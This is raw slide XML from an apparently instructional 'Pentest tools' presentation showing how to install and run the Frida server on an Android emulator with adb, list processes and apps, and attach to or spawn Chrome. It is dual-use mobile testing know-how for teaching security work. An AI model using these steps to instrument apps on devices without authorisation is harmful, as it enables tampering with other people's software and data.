            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>github.com</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/releases/download/$VER/</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-server-$VER-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>android</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ABI.xz</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -d </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-server-$VER-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>android</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ABI.xz</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRP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Frida : https://frida.re/</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815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18730" y="1447801"/>
            <a:ext cx="8503057" cy="5221559"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Finally, upload the server on your emulator and execute it :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="200000"/>
              <a:buNone/>
            </a:pP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push </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-server-$VER-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>android</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ABI.xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /data/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="200000"/>
              <a:buNone/>
            </a:pP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shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "chmod 755 /data/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="200000"/>
              <a:buNone/>
            </a:pP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shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "/data/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</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frida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-server"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="200000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Note </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>adb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>needs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> to run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>!</a:t>
            </a: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Frida : https://frida.re/</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297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lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Get the list of running processes/applications :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>frida-ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -U</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buSzPct val="200000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PID    Name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buSzPct val="200000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>--------------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buSzPct val="200000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>4527   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>adbd</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buSzPct val="200000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>4248   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>android.process.acore</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buSzPct val="200000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1375   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>audioserver</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buSzPct val="200000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="160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fr-FR"/>
              <a:t>Frida : https://frida.re/</a:t>
            </a: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FR" sz="1100">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>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372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8730" y="1447801"/>
            <a:ext cx="8503057" cy="541773"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Get the list of installed applications with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>option</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="180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fr-FR"/>
              <a:t>Frida : https://frida.re/</a:t>
            </a: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FR" sz="1100">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>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18729" y="2088863"/>
            <a:ext cx="8503058" cy="2480679"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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frida-ps -U –i</a:t>
            </a:r>
          </a:p>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PID     Name                            Identifier</a:t>
            </a:r>
          </a:p>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a:t>
            </a:r>
          </a:p>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1625 Android System                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>android</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>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1625 Call Management                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>com.android.server.telecom</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>5516 Chrome                             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>com.android.chrome</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600">
              <a:solidFill>
                <a:srgbClr val="0D0B0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157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dirty="0"/>
              <a:t>By default, Frida tries to attach to a running process :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>frida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -U </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>com.android.chrome</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>To spawn an application, use the -f option as follow :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>frida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -U -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>com.android.chrome</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>By default, the process is paused :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>frida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -U -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>com.android.chrome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> --no-pause</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Titre 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>Pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Tools</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
